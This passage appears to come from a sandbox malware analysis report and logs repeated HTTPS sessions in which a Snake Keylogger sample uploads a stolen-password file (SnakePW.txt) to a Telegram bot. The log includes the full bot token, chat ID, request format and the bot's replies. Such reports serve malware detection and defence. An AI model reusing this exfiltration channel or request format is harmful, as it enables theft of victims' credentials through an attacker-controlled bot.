                            2022-06-26 07:34:04 UTC339OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 37 37 34 64 66 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570774df27Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:04 UTC340INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:04 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:04 UTC340INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66974,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228844,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            202192.168.2.550088149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:04 UTC341OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575707b2db3c
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:04 UTC341OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 37 62 32 64 62 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575707b2db3cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:04 UTC341INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:04 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:04 UTC342INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66975,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228844,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            203192.168.2.550091149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:05 UTC342OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575707f0d815
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:05 UTC343OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 37 66 30 64 38 31 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575707f0d815Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:05 UTC343INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:05 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:05 UTC344INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66976,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228845,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            204192.168.2.550094149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:05 UTC344OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757082c7276
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:05 UTC344OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 38 32 63 37 32 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757082c7276Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:05 UTC345INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:05 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:05 UTC345INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 37 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66977,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228845,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            205192.168.2.550095149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:05 UTC346OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757086a6f82
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:05 UTC346OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 38 36 61 36 66 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757086a6f82Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:06 UTC347INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:06 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:06 UTC347INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66978,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228846,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            206192.168.2.550098149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:06 UTC347OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575708a60af7
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:06 UTC348OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 38 61 36 30 61 66 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575708a60af7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:06 UTC348INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:06 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:06 UTC349INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66979,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228846,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            207192.168.2.550100149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:07 UTC349OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575709220422
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:07 UTC349OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 39 32 32 30 34 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575709220422Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:07 UTC350INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:07 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:07 UTC350INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 34 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66981,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228847,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            208192.168.2.550102149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:07 UTC351OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da57570964c68e
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:07 UTC351OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 39 36 34 63 36 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da57570964c68eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:07 UTC352INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
